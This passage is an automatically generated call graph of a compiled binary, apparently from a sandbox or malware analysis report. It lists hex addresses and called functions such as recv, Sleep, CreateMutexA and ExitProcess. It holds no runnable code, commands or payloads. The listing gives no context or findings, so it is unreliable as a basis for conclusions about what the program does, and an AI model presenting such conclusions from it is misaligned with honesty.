10402->10406 10403->10405 10407 f6f2c2 10405->10407 10406->10394 10408 f6f2df 10407->10408 10409 f6f2ce 10407->10409 10408->10406 10409->10408 10410 f6adf5 ___free_lconv_mon RtlAllocateHeap 10409->10410 10410->10408 10412 f32296 10411->10412 10415 f687f8 10412->10415 10418 f67609 10415->10418 10417 f322a4 10417->10134 10419 f67631 10418->10419 10420 f67649 10418->10420 10421 f675f6 __dosmaperr RtlAllocateHeap 10419->10421 10420->10419 10422 f67651 10420->10422 10423 f67636 10421->10423 10424 f6690a __cftof 4 API calls 10422->10424 10425 f66c5a __cftof RtlAllocateHeap 10423->10425 10426 f67661 10424->10426 10427 f67641 __floor_pentium4 10425->10427 10431 f67bc4 10426->10431 10427->10417 10447 f6868d 10431->10447 10433 f676e8 10444 f67a19 10433->10444 10434 f67be4 10435 f675f6 __dosmaperr RtlAllocateHeap 10434->10435 10436 f67be9 10435->10436 10437 f66c5a __cftof RtlAllocateHeap 10436->10437 10437->10433 10442 f67bd5 10442->10433 10442->10434 10454 f67d15 10442->10454 10462 f68168 10442->10462 10467 f67dc2 10442->10467 10472 f67de8 10442->10472 10501 f67f36 10442->10501 10445 f6adf5 ___free_lconv_mon RtlAllocateHeap 10444->10445 10446 f67a29 10445->10446 10446->10427 10448 f686a5 10447->10448 10449 f68692 10447->10449 10448->10442 10450 f675f6 __dosmaperr RtlAllocateHeap 10449->10450 10451 f68697 10450->10451 10452 f66c5a __cftof RtlAllocateHeap 10451->10452 10453 f686a2 10452->10453 10453->10442 10523 f67d34 10454->10523 10456 f67d1a 10457 f67d31 10456->10457 10458 f675f6 __dosmaperr RtlAllocateHeap 10456->10458 10457->10442 10459 f67d23 10458->10459 10460 f66c5a __cftof RtlAllocateHeap 10459->10460 10461 f67d2e 10460->10461 10461->10442 10463 f68171 10462->10463 10464 f68178 10462->10464 10532 f67b50 10463->10532 10464->10442 10468 f67dd2 10467->10468 10469 f67dcb 10467->10469 10468->10442 10470 f67b50 4 API calls 10469->10470 10471 f67dd1 10470->10471 10471->10442 10473 f67def 10472->10473 10474 f67e09 10472->10474 10475 f67f4f 10473->10475 10476 f67fbb 10473->10476 10477 f67e39 10473->10477 10474->10477 10478 f675f6 __dosmaperr RtlAllocateHeap 10474->10478 10487 f67f5b 10475->10487 10491 f67f92 10475->10491 10480 f67fc2 10476->10480 10481 f68001 10476->10481 10476->10491 10477->10442 10479 f67e25 10478->10479 10482 f66c5a __cftof RtlAllocateHeap 10479->10482 10484 f67fc7 10480->10484 10485 f67f69 10480->10485 10591 f68604 10481->10591 10486 f67e30 10482->10486 10484->10491 10492 f67fcc 10484->10492 10498 f67f77 10485->10498 10500 f67f8b 10485->10500 10585 f68241 10485->10585 10486->10442 10487->10485 10490 f67fa2 10487->10490 10487->10498 10490->10500 10562 f68390 10490->10562 10491->10498 10491->10500 10576 f68420 10491->10576 10493 f67fd1 10492->10493 10494 f67fdf 10492->10494 10493->10500 10566 f685e5 10493->10566 10570 f68571 10494->10570 10498->10500 10594 f686ea 10498->10594 10500->10442 10502 f67f4f 10501->10502 10503 f67fbb 10501->10503 10510 f67f92 10502->10510 10512 f67f5b 10502->10512 10504 f67fc2 10503->10504 10505 f68001 10503->10505 10503->10510 10506 f67fc7 10504->10506 10507 f67f69 10504->10507 10508 f68604 RtlAllocateHeap 10505->10508 10506->10510 10515 f67fcc 10506->10515 10511 f67f8b 10507->10511 10514 f68241 4 API calls 10507->10514 10522 f67f77 10507->10522 10508->10522 10509 f67fa2 10509->10511 10519 f68390 4 API calls 10509->10519 10510->10511 10513 f68420 RtlAllocateHeap 10510->10513 10510->10522 10511->10442 10512->10507 10512->10509 10512->10522 10513->10522 10514->10522 10516 f67fd1 10515->10516 10517 f67fdf 10515->10517 10516->10511 10520 f685e5 RtlAllocateHeap 10516->10520 10518 f68571 RtlAllocateHeap 10517->10518 10518->10522 10519->10522 10520->10522 10521 f686ea 4 API calls 10521->10511 10522->10511 10522->10521 10526 f67d5e 10523->10526 10525 f67d40 10525->10456 10528 f67d80 10526->10528 10527 f67db7 10527->10525 10528->10527 10529 f675f6 __dosmaperr RtlAllocateHeap 10528->10529 10530 f67dac 10529->10530 10531 f66c5a __cftof RtlAllocateHeap 10530->10531 10531->10527 10533 f67b62 10532->10533 10534 f67b67 10532->10534 10535 f675f6 __dosmaperr RtlAllocateHeap 10533->10535 10540 f68ab6 10534->10540 10535->10534 10538 f675f6 __dosmaperr RtlAllocateHeap 10539 f67b99 10538->10539 10539->10442 10541 f68ad1 10540->10541 10544 f68868 10541->10544 10545 f6868d RtlAllocateHeap 10544->10545 10549 f6887a 10545->10549 10546 f688b3 10547 f6690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10546->10547 10554 f688bf 10547->10554 10548 f6888f 10550 f675f6 __dosmaperr RtlAllocateHeap 10548->10550 10549->10546 10549->10548 10561 f67b85 10549->10561 10551 f68894 10550->10551 10553 f66c5a __cftof RtlAllocateHeap 10551->10553 10552 f66d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10552->10554 10553->10561 10554->10552 10555 f688ee 10554->10555 10557 f68a8d RtlAllocateHeap 10555->10557 10558 f68958 10555->10558 10556 f68a8d RtlAllocateHeap 10559 f68a20 10556->10559 10557->10558 10558->10556 10560 f675f6 __dosmaperr RtlAllocateHeap 10559->10560 10559->10561 10560->10561 10561->10538 10561->10539 10563 f683ab 10562->10563 10564 f683dd 10563->10564 10598 f6c88e 10563->10598 10564->10498 10567 f685f1 10566->10567 10568 f68420 RtlAllocateHeap 10567->10568 10569 f68603 10568->10569 10569->10498 10575 f68586 10570->10575 10571 f675f6 __dosmaperr RtlAllocateHeap 10572 f6858f 10571->10572 10573 f66c5a __cftof RtlAllocateHeap 10572->10573 10574 f6859a 10573->10574 10574->10498 10575->10571 10575->10574 10577 f68433 10576->10577 10578 f68465 10577->10578 10579 f6844e 10577->10579 10584 f6845e 10578->10584 10622 f6779f 10578->10622 10580 f675f6 __dosmaperr RtlAllocateHeap 10579->10580 10581 f68453 10580->10581 10583 f66c5a __cftof RtlAllocateHeap 10581->10583 10583->10584 10584->10498 10586 f6825a 10585->10586 10587 f6779f RtlAllocateHeap 10586->10587 10588 f68297 10587->10588 10635 f6d3c8 10588->10635 10590 f6830d 10590->10498 10590->10590 10592 f68420 RtlAllocateHeap 10591->10592 10593 f6861b 10592->10593 10593->10498 10595 f68707 10594->10595 10596 f6875d __floor_pentium4 10594->10596 10595->10596 10597 f6c88e __cftof 4 API calls 10595->10597 10596->10500 10597->10595 10601 f6c733 10598->10601 10602 f6c743 10601->10602 10603 f6c748 10602->10603 10604 f6c781 10602->10604 10605 f6c76d 10602->10605 10603->10564 10607 f6690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10604->10607 10606 f675f6 __dosmaperr RtlAllocateHeap 10605->10606 10608 f6c772 10606->10608 10609 f6c78c 10607->10609 10610 f66c5a __cftof RtlAllocateHeap 10608->10610 10611 f6c79c 10609->10611 10619 f6c7c8 __cftof 10609->10619 10610->10603 10612 f72b7d __cftof RtlAllocateHeap 10611->10612 10613 f6c7b1 10612->10613 10613->10603 10615 f675f6 __dosmaperr RtlAllocateHeap 10613->10615 10614 f675f6 __dosmaperr RtlAllocateHeap 10614->10603 10615->10603 10616 f675f6 __dosmaperr RtlAllocateHeap 10618 f6c87f 10616->10618 10617 f6c7de __cftof 10617->10603 10617->10614 10620 f66c5a __cftof RtlAllocateHeap 10618->10620 10619->10617 10621 f6c815 __cftof 10619->10621 10620->10603 10621->10603 10621->10616 10623 f677b4 10622->10623 10624 f677c3 10622->10624 10625 f675f6 __dosmaperr RtlAllocateHeap 10623->10625 10626 f677b9 10624->10626 10627 f6b04b __cftof RtlAllocateHeap 10624->10627 10625->10626 10626->10584 10628 f677ea 10627->10628 10629 f67801 10628->10629 10632 f67a33 10628->10632 10631 f6adf5 ___free_lconv_mon RtlAllocateHeap 10629->10631 10631->10626 10633 f6adf5 ___free_lconv_mon RtlAllocateHeap 10632->10633 10634 f67a42 10633->10634 10634->10629 10636 f6d3ee 10635->10636 10637 f6d3d8 10635->10637 10636->10637 10641 f6d400 10636->10641 10638 f675f6 __dosmaperr RtlAllocateHeap 10637->10638 10639 f6d3dd 10638->10639 10640 f66c5a __cftof RtlAllocateHeap 10639->10640 10642 f6d3e7 10640->10642 10643 f6d467 10641->10643 10645 f6d439 10641->10645 10642->10590 10644 f6d485 10643->10644 10646 f6d48a 10643->10646 10648 f6d4e4 10644->10648 10649 f6d4ae 10644->10649 10656 f6d2ff 10645->10656 10661 f6cbdf 10646->10661 10689 f6cef8 10648->10689 10651 f6d4b3 10649->10651 10652 f6d4cc 10649->10652 10672 f6d23e 10651->10672 10682 f6d0e2 10652->10682 10657 f6d315 10656->10657 10658 f6d320 10656->10658 10657->10642 10659 f6a1f1 ___std_exception_copy RtlAllocateHeap 10658->10659 10660 f6d37b __cftof 10659->10660 10660->10642 10662 f6cbf1 10661->10662 10663 f6690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10662->10663 10664 f6cc05 10663->10664 10665 f6cc21 10664->10665 10666 f6cc0d 10664->10666 10669 f6cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10665->10669 10671 f6cc1c __alldvrm __cftof _strrchr 10665->10671 10667 f675f6 __dosmaperr RtlAllocateHeap 10666->10667 10668 f6cc12 10667->10668 10670 f66c5a __cftof RtlAllocateHeap 10668->10670 10669->10671 10670->10671 10671->10642 10673 f731a8 RtlAllocateHeap 10672->10673 10674 f6d26c 10673->10674 10675 f72c47 RtlAllocateHeap 10674->10675 10676 f6d29e 10675->10676 10677 f6d2a5 10676->10677 10678 f6d2de 10676->10678 10680 f6d2b7 10676->10680 10677->10642 10679 f6cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10678->10679 10679->10677 10681 f6d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10680->10681 10681->10677 10683 f731a8 RtlAllocateHeap 10682->10683 10684 f6d10f 10683->10684 10685 f72c47 RtlAllocateHeap 10684->10685 10686 f6d147 10685->10686 10687 f6d14e 10686->10687 10688 f6d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10686->10688 10687->10642 10688->10687 10690 f6cf10 10689->10690 10691 f731a8 RtlAllocateHeap 10690->10691 10692 f6cf29 10691->10692 10693 f72c47 RtlAllocateHeap 10692->10693 10694 f6cf6e 10693->10694 10695 f6cf75 10694->10695 10696 f6cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10694->10696 10695->10642 10696->10695 10698 f4908e 10697->10698 10699 f48f6b 10697->10699 10700 f49270 RtlAllocateHeap 10698->10700 10703 f48fb2 10699->10703 10704 f48fdc 10699->10704 10701 f49093 10700->10701 10702 f32480 RtlAllocateHeap 10701->10702 10710 f48fc3 __cftof 10702->10710 10703->10701 10705 f48fbd 10703->10705 10708 f4d3e2 RtlAllocateHeap 10704->10708 10704->10710 10707 f4d3e2 RtlAllocateHeap 10705->10707 10706 f66c6a RtlAllocateHeap 10709 f4909d 10706->10709 10707->10710 10708->10710 10711 f490b8 10709->10711 10713 f32480 Concurrency::cancel_current_task 10709->10713 10714 f490be 10709->10714 10710->10706 10715 f4904c shared_ptr __cftof 10710->10715 10712 f4d3e2 RtlAllocateHeap 10711->10712 10712->10714 10716 f638af ___std_exception_copy RtlAllocateHeap 10713->10716 10714->10191 10715->10191 10717 f324c3 10716->10717 10717->10191 10728 f32ec0 10729 f32f06 10728->10729 10732 f32f6f 10728->10732 10764 f4c6ac 10729->10764 10740 f4c6ac GetSystemTimePreciseAsFileTime 10732->10740 10749 f32fef 10732->10749 10733 f3301e 10767 f4c26a 10733->10767 10734 f32f1d 10737 f4d3e2 RtlAllocateHeap 10734->10737 10739 f32f30 __Mtx_unlock 10734->10739 10736 f33024 10738 f4c26a 5 API calls 10736->10738 10737->10739 10741 f32fb9 10738->10741 10739->10732 10739->10736 10740->10741 10742 f4c26a 5 API calls 10741->10742 10744 f32fc0 __Mtx_unlock 10741->10744 10742->10744 10743 f4c26a 5 API calls 10745 f32fd8 __Cnd_broadcast 10743->10745 10744->10743 10744->10745 10746 f4c26a 5 API calls 10745->10746 10745->10749 10747 f3303c 10746->10747 10748 f4c6ac GetSystemTimePreciseAsFileTime 10747->10748 10759 f33080 shared_ptr __Mtx_unlock 10748->10759 10750 f331c5 10751 f4c26a 5 API calls 10750->10751 10752 f331cb 10751->10752 10753 f4c26a 5 API calls 10752->10753 10754 f331d1 10753->10754 10755 f4c26a 5 API calls 10754->10755 10761 f33193 __Mtx_unlock 10755->10761 10756 f331a7 __floor_pentium4 10757 f4c26a 5 API calls 10758 f331dd 10757->10758 10759->10750 10759->10752 10759->10756 10760 f4c6ac GetSystemTimePreciseAsFileTime 10759->10760 10762 f3315f 10760->10762 10761->10756 10761->10757 10762->10750 10762->10754 10762->10761 10771 f4bd4c 10762->10771 10774 f4c452 10764->10774 10766 f32f12 10766->10733 10766->10734 10768 f4c292 10767->10768 10769 f4c274 10767->10769 10768->10768 10769->10768 10791 f4c297 10769->10791 10844 f4bb72 10771->10844 10773 f4bd5c 10773->10762 10775 f4c4a8 10774->10775 10777 f4c47a __floor_pentium4 10774->10777 10775->10777 10780 f4cf6b 10775->10780 10777->10766 10778 f4c4fd __Xtime_diff_to_millis2 10778->10777 10779 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 10778->10779 10779->10778 10781 f4cf7a 10780->10781 10783 f4cf87 __aulldvrm 10780->10783 10781->10783 10784 f4cf44 10781->10784 10783->10778 10787 f4cbea 10784->10787 10788 f4cc07 10787->10788 10789 f4cbfb GetSystemTimePreciseAsFileTime 10787->10789 10788->10783 10789->10788 10796 f32ae0 10791->10796 10793 f4c2ae 10803 f4c1ff 10793->10803 10795 f4c2bf Concurrency::cancel_current_task 10811 f4bedf 10796->10811 10798 f32af4 __dosmaperr 10798->10793 10799 f6a671 __cftof 4 API calls 10798->10799 10802 f66ccc 10799->10802 10800 f68bec __cftof 4 API calls 10801 f66cf6 10800->10801 10802->10800 10804 f4c20b __EH_prolog3_GS 10803->10804 10805 f480c0 RtlAllocateHeap 10804->10805 10806 f4c23d 10805->10806 10818 f326b0 10806->10818 10808 f4c252 10835 f47970 10808->10835 10810 f4c25a 10810->10795 10814 f4cc31 10811->10814 10815 f4cc3f InitOnceExecuteOnce 10814->10815 10817 f4bef2 10814->10817 10815->10817 10817->10798 10819 f47a00 RtlAllocateHeap 10818->10819 10820 f32702 10819->10820 10821 f32725 10820->10821 10822 f48f40 RtlAllocateHeap 10820->10822 10823 f48f40 RtlAllocateHeap 10821->10823 10824 f3278e 10821->10824 10822->10821 10823->10824 10825 f327ed shared_ptr 10824->10825 10827 f328b8 10824->10827 10826 f638af ___std_exception_copy RtlAllocateHeap 10825->10826 10830 f3284b 10826->10830 10828 f66c6a RtlAllocateHeap 10827->10828 10828->10830 10829 f3287a shared_ptr __floor_pentium4 10829->10808 10830->10829 10831 f66c6a RtlAllocateHeap 10830->10831 10832 f328c2 10831->10832 10840 f63912 10832->10840 10834 f328e5 shared_ptr 10834->10808 10836 f4797b 10835->10836 10837 f47996 shared_ptr 10835->10837 10836->10837 10838 f66c6a RtlAllocateHeap 10836->10838 10837->10810 10839 f479ba 10838->10839 10841 f63926 10840->10841 10842 f6391f 10840->10842 10841->10834 10843 f68ba3 ___std_exception_destroy RtlAllocateHeap 10842->10843 10843->10841 10845 f4bb9c 10844->10845 10846 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 10845->10846 10849 f4bba4 __Xtime_diff_to_millis2 __floor_pentium4 10845->10849 10847 f4bbcf __Xtime_diff_to_millis2 10846->10847 10848 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 10847->10848 10847->10849 10848->10849 10849->10773 10850 f4d0c7 10851 f4d0d7 10850->10851 10852 f4d17f 10851->10852 10853 f4d17b RtlWakeAllConditionVariable 10851->10853 10854 f3e0c0 recv 10855 f3e122 recv 10854->10855 10856 f3e157 recv 10855->10856 10857 f3e191 10856->10857 10858 f3e2b3 __floor_pentium4 10857->10858 10859 f4c6ac GetSystemTimePreciseAsFileTime 10857->10859 10860 f3e2ee 10859->10860 10861 f4c26a 5 API calls 10860->10861 10862 f3e358 10861->10862 10898 f342b0 10901 f33ac0 10898->10901 10900 f342bb shared_ptr 10902 f33af9 10901->10902 10903 f66c6a RtlAllocateHeap 10902->10903 10907 f33b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10902->10907 10904 f33be6 10903->10904 10908 f33c38 10904->10908 10922 f332d0 10904->10922 10905 f332d0 6 API calls 10910 f33c5f 10905->10910 10907->10900 10908->10905 10908->10910 10909 f33c68 10909->10900 10910->10909 10941 f33810 10910->10941 10923 f4c6ac GetSystemTimePreciseAsFileTime 10922->10923 10930 f33314 10923->10930 10924 f3336b 10925 f4c26a 5 API calls 10924->10925 10926 f3333c __Mtx_unlock 10925->10926 10928 f4c26a 5 API calls 10926->10928 10931 f33350 __floor_pentium4 10926->10931 10927 f4bd4c GetSystemTimePreciseAsFileTime 10927->10930 10929 f33377 10928->10929 10932 f4c6ac GetSystemTimePreciseAsFileTime 10929->10932 10930->10924 10930->10926 10930->10927 10931->10908 10933 f333af 10932->10933 10934 f4c26a 5 API calls 10933->10934 10935 f333b6 __Cnd_broadcast 10933->10935 10934->10935 10936 f4c26a 5 API calls 10935->10936 10937 f333d7 __Mtx_unlock 10935->10937 10936->10937 10938 f4c26a 5 API calls 10937->10938 10939 f333eb 10937->10939 10940 f3340e 10938->10940 10939->10908 10940->10908 10942 f3381c 10941->10942 10945 f32440 10942->10945 10948 f4b5d6 10945->10948 10947 f32472 10949 f4b5f1 Concurrency::cancel_current_task 10948->10949 10950 f68bec __cftof 4 API calls 10949->10950 10952 f4b658 __cftof __floor_pentium4 10949->10952 10951 f4b69f 10950->10951 10952->10947 10953 f39ab8 10955 f39acc 10953->10955 10956 f39b08 10955->10956 10957 f39b4b shared_ptr 10956->10957 10961 f3a917 10956->10961 10958 f39b65 10957->10958 10959 f39b59 10957->10959 10960 f47a00 RtlAllocateHeap 10958->10960 10963 f480c0 RtlAllocateHeap 10959->10963 10962 f39b74 10960->10962 10964 f3a953 Sleep CreateMutexA 10961->10964 10965 f66c6a RtlAllocateHeap 10961->10965 10966 f35c10 4 API calls 10962->10966 10967 f3a903 10963->10967 10969 f3a98e 10964->10969 10965->10964 10968 f39b7c 10966->10968 10970 f38b30 4 API calls 10968->10970 10971 f39b8d 10970->10971 10972 f48220 RtlAllocateHeap 10971->10972 10973 f39b9c 10972->10973 10974 f47a00 RtlAllocateHeap 10973->10974 10975 f39ca9 10974->10975 10976 f35c10 4 API calls 10975->10976 10977 f39cb1 10976->10977 10978 f38b30 4 API calls 10977->10978 10979 f39cc2 10978->10979 10980 f48220 RtlAllocateHeap 10979->10980 10981 f39cd1 10980->10981 10992 f320a0 10993 f4c68b __Mtx_init_in_situ 2 API calls 10992->10993 10994 f320ac 10993->10994 10995 f4d64e RtlAllocateHeap 10994->10995 10996 f320b6 10995->10996 11027 f334a0 11028 f334aa 11027->11028 11029 f334ca shared_ptr 11027->11029 11028->11029 11030 f66c6a RtlAllocateHeap 11028->11030 11031 f334f2 11030->11031 11033 f33537 shared_ptr 11031->11033 11035 f4c17c 11031->11035 11036 f4c18a Concurrency::cancel_current_task 11035->11036 11039 f4c0e9 11036->11039 11038 f4c1aa Concurrency::cancel_current_task 11040 f322e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11039->11040 11041 f4c0fb 11040->11041 11041->11038 11042 f35cad 11044 f35caf shared_ptr 11042->11044 11043 f35d17 shared_ptr __floor_pentium4 11044->11043 11045 f66c6a RtlAllocateHeap 11044->11045 11046 f35d47 __cftof 11045->11046 11046->11046 11047 f480c0 RtlAllocateHeap 11046->11047 11049 f35e3e 11047->11049 11048 f35ea6 shared_ptr __floor_pentium4 11049->11048 11050 f66c6a RtlAllocateHeap 11049->11050 11051 f35ed2 11050->11051 11052 f35ffe shared_ptr __floor_pentium4 11051->11052 11053 f66c6a RtlAllocateHeap 11051->11053 11054 f3601b 11053->11054 11055 f480c0 RtlAllocateHeap 11054->11055 11056 f36089 11055->11056 11057 f480c0 RtlAllocateHeap 11056->11057 11058 f360bd 11057->11058 11059 f480c0 RtlAllocateHeap 11058->11059 11060 f360ee 11059->11060 11061 f480c0 RtlAllocateHeap 11060->11061 11062 f3611f 11061->11062 11063 f480c0 RtlAllocateHeap 11062->11063 11065 f36150 11063->11065 11064 f365b1 shared_ptr __floor_pentium4 11065->11064 11066 f66c6a RtlAllocateHeap 11065->11066 11067 f365dc 11066->11067 11068 f47a00 RtlAllocateHeap 11067->11068 11069 f366a6 11068->11069 11070 f35c10 4 API calls 11069->11070 11071 f366ac 11070->11071 11072 f35c10 4 API calls 11071->11072 11073 f366b1 11072->11073 11074 f322c0 4 API calls 11073->11074 11075 f366c9 shared_ptr 11074->11075 11076 f47a00 RtlAllocateHeap 11075->11076 11077 f36732 11076->11077 11078 f35c10 4 API calls 11077->11078 11079 f3673d 11078->11079 11080 f322c0 4 API calls 11079->11080 11089 f36757 shared_ptr 11080->11089 11081 f36852 11082 f480c0 RtlAllocateHeap 11081->11082 11084 f3689c 11082->11084 11083 f47a00 RtlAllocateHeap 11083->11089 11085 f480c0 RtlAllocateHeap 11084->11085 11088 f368e3 shared_ptr __floor_pentium4 11085->11088 11086 f35c10 4 API calls 11086->11089 11087 f322c0 4 API calls 11087->11089 11089->11081 11089->11083 11089->11086 11089->11087 11097 f35a9e 11100 f35a61 11097->11100 11098 f480c0 RtlAllocateHeap 11098->11100 11100->11097 11100->11098 11101 f47a00 RtlAllocateHeap 11100->11101 11102 f35bdd __floor_pentium4 11100->11102 11103 f35730 11100->11103 11101->11100 11107 f35860 shared_ptr 11103->11107 11111 f35799 shared_ptr 11103->11111 11104 f3592a 11112 f48200 11104->11112 11105 f480c0 RtlAllocateHeap 11105->11111 11108 f35900 shared_ptr __floor_pentium4 11107->11108 11109 f66c6a RtlAllocateHeap 11107->11109 11108->11100 11110 f35934 11109->11110 11111->11104 11111->11105 11111->11107 11115 f4c1d9 11112->11115 11114 f4820a 11118 f4c15d 11115->11118 11117 f4c1ea Concurrency::cancel_current_task 11117->11114 11119 f322e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11118->11119 11120 f4c16f 11119->11120 11120->11117 11121 f3a682 11123 f3a68a shared_ptr 11121->11123 11122 f3a949 11124 f3a94e 11122->11124 11125 f66c6a RtlAllocateHeap 11122->11125 11123->11122 11126 f3a75d shared_ptr 11123->11126 11127 f3a953 Sleep CreateMutexA 11124->11127 11128 f66c6a RtlAllocateHeap 11124->11128 11125->11124 11129 f480c0 RtlAllocateHeap 11126->11129 11131 f3a98e 11127->11131 11128->11127 11130 f3a903 11129->11130 11172 f48680 11173 f486e0 11172->11173 11173->11173 11181 f47760 11173->11181 11175 f486f9 11176 f48714 11175->11176 11177 f48f40 RtlAllocateHeap 11175->11177 11178 f48f40 RtlAllocateHeap 11176->11178 11180 f48769 11176->11180 11177->11176 11179 f487b1 11178->11179 11182 f47864 shared_ptr __cftof 11181->11182 11184 f4777b 11181->11184 11182->11175 11183 f477fb __cftof 11183->11182 11194 f66c6a RtlAllocateHeap 11183->11194 11184->11182 11184->11183 11185 f478f1 11184->11185 11188 f477ea 11184->11188 11190 f47811 11184->11190 11186 f49270 RtlAllocateHeap 11185->11186 11187 f478f6 11186->11187 11189 f32480 RtlAllocateHeap 11187->11189 11188->11187 11192 f4d3e2 RtlAllocateHeap 11188->11192 11191 f478fb 11189->11191 11190->11183 11193 f4d3e2 RtlAllocateHeap 11190->11193 11192->11183 11193->11183 11194->11185 11195 f33c8e 11196 f33c98 11195->11196 11198 f33cb4 11196->11198 11214 f32410 11196->11214 11200 f33810 4 API calls 11198->11200 11202 f33ccf 11200->11202 11203 f33810 4 API calls 11202->11203 11204 f33cdb 11203->11204 11206 f33d52 11204->11206 11229 f47d50 11204->11229 11207 f4d3e2 RtlAllocateHeap 11206->11207 11208 f33d84 11207->11208 11209 f47d50 RtlAllocateHeap 11208->11209 11211 f33e03 11208->11211 11209->11211 11210 f33e9b shared_ptr 11211->11210 11212 f66c6a RtlAllocateHeap 11211->11212 11213 f33ec1 11212->11213 11215 f32424 11214->11215 11261 f4b52d 11215->11261 11218 f33ce0 11219 f33d42 11218->11219 11221 f33d52 11218->11221 11220 f47d50 RtlAllocateHeap 11219->11220 11220->11221 11222 f4d3e2 RtlAllocateHeap 11221->11222 11223 f33d84 11222->11223 11224 f47d50 RtlAllocateHeap 11223->11224 11225 f33e03 11223->11225 11224->11225 11226 f33e9b shared_ptr 11225->11226 11227 f66c6a RtlAllocateHeap 11225->11227 11226->11198 11228 f33ec1 11227->11228 11230 f47d62 11229->11230 11231 f47dcb 11229->11231 11233 f47d9c 11230->11233 11234 f47d6d 11230->11234 11232 f32480 RtlAllocateHeap 11231->11232 11236 f47d7a 11232->11236 11235 f47db9 11233->11235 11238 f4d3e2 RtlAllocateHeap 11233->11238 11234->11231 11237 f47d74 11234->11237 11235->11206 11239 f66c6a RtlAllocateHeap 11236->11239 11242 f47d83 11236->11242 11240 f4d3e2 RtlAllocateHeap 11237->11240 11241 f47da6 11238->11241 11244 f47dd5 11239->11244 11240->11236 11241->11206 11242->11206 11243 f47f20 11245 f49270 RtlAllocateHeap 11243->11245 11244->11243 11246 f47e01 11244->11246 11248 f47f1b 11244->11248 11249 f47ea7 11244->11249 11250 f47e80 11244->11250 11257 f47e91 __cftof 11245->11257 11246->11206 11247 f66c6a RtlAllocateHeap 11255 f47f2a __cftof 11247->11255 11251 f32480 RtlAllocateHeap 11248->11251 11254 f4d3e2 RtlAllocateHeap 11249->11254 11249->11257 11250->11248 11252 f47e8b 11250->11252 11251->11243 11253 f4d3e2 RtlAllocateHeap 11252->11253 11253->11257 11254->11257 11256 f47f61 shared_ptr 11255->11256 11258 f66c6a RtlAllocateHeap 11255->11258 11256->11206 11257->11247 11260 f47f02 shared_ptr 11257->11260 11259 f47f7c 11258->11259 11260->11206 11269 f63aed 11261->11269 11263 f4b5a5 ___std_exception_copy 11276 f4b1ad 11263->11276 11264 f4b598 11272 f4af56 11264->11272 11268 f3242a 11268->11218 11280 f64f29 11269->11280 11271 f4b555 11271->11263 11271->11264 11271->11268 11273 f4af9f ___std_exception_copy 11272->11273 11275 f4afb2 shared_ptr 11273->11275 11292 f4b39f 11273->11292 11275->11268 11277 f4b1e1 shared_ptr 11276->11277 11278 f4b1d8 11276->11278 11277->11268 11279 f4b39f 5 API calls 11278->11279 11279->11277 11287 f64f37 11280->11287 11282 f64f2e __cftof 11282->11271 11283 f6d634 __cftof 4 API calls 11282->11283 11286 f68bfc __cftof 11282->11286 11283->11286 11284 f665ed __cftof 3 API calls 11285 f68c2f 11284->11285 11286->11284 11288 f64f40 11287->11288 11289 f64f43 11287->11289 11288->11282 11290 f68ba3 ___std_exception_destroy RtlAllocateHeap 11289->11290 11291 f64f77 11289->11291 11290->11291 11291->11282 11293 f4bedf InitOnceExecuteOnce 11292->11293 11294 f4b3e1 11293->11294 11295 f4b3e8 11294->11295 11303 f66cbb 11294->11303 11295->11275 11304 f66cc7 __dosmaperr 11303->11304 11305 f6a671 __cftof 4 API calls 11304->11305 11308 f66ccc 11305->11308 11306 f68bec __cftof 4 API calls 11307 f66cf6 11306->11307 11308->11306 11318 f34276 11319 f32410 5 API calls 11318->11319 11320 f3427f 11319->11320 11321 f33ce0 RtlAllocateHeap 11320->11321 11322 f3428f 11321->11322 11323 f3a079 11324 f3a081 shared_ptr 11323->11324 11325 f3a930 11324->11325 11326 f3a154 shared_ptr 11324->11326 11327 f66c6a RtlAllocateHeap 11325->11327 11329 f480c0 RtlAllocateHeap 11326->11329 11328 f3a953 Sleep CreateMutexA 11327->11328 11331 f3a98e 11328->11331 11330 f3a903 11329->11330 11332 f3cc79 11333 f3cc84 shared_ptr 11332->11333 11334 f3ccda shared_ptr __floor_pentium4 11333->11334 11335 f66c6a RtlAllocateHeap 11333->11335 11336 f3ce36 11335->11336 11337 f47a00 RtlAllocateHeap 11336->11337 11338 f3ce92 11337->11338 11339 f35c10 4 API calls 11338->11339 11340 f3ce9d 11339->11340 11342 f3ca70 11340->11342 11343 f3cadd 11342->11343 11344 f3cc87 11343->11344 11345 f47a00 RtlAllocateHeap 11343->11345 11348 f3ccda shared_ptr __floor_pentium4 11344->11348 11350 f66c6a RtlAllocateHeap 11344->11350 11346 f3ccee 11345->11346 11347 f35c10 4 API calls 11346->11347 11349 f3ccf9 11347->11349 11362 f39030 11349->11362 11352 f3ce36 11350->11352 11354 f47a00 RtlAllocateHeap 11352->11354 11353 f3cd0d 11355 f48220 RtlAllocateHeap 11353->11355 11356 f3ce92 11354->11356 11357 f3cd1f 11355->11357 11358 f35c10 4 API calls 11356->11358 11361 f48f40 RtlAllocateHeap 11357->11361 11359 f3ce9d 11358->11359 11360 f3ca70 4 API calls 11359->11360 11361->11344 11363 f39080 11362->11363 11364 f47a00 RtlAllocateHeap 11363->11364 11365 f3908f 11364->11365 11366 f35c10 4 API calls 11365->11366 11367 f3909a 11366->11367 11368 f480c0 RtlAllocateHeap 11367->11368 11369 f390ec 11368->11369 11370 f48220 RtlAllocateHeap 11369->11370 11372 f390fe shared_ptr 11370->11372 11371 f3917e shared_ptr __floor_pentium4 11371->11353 11372->11371 11373 f66c6a RtlAllocateHeap 11372->11373 11374 f391aa 11373->11374 11420 f4be50 11423 f4bd8b 11420->11423 11422 f4be66 Concurrency::cancel_current_task std::_Throw_future_error 11424 f322e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11423->11424 11425 f4bd9f 11424->11425 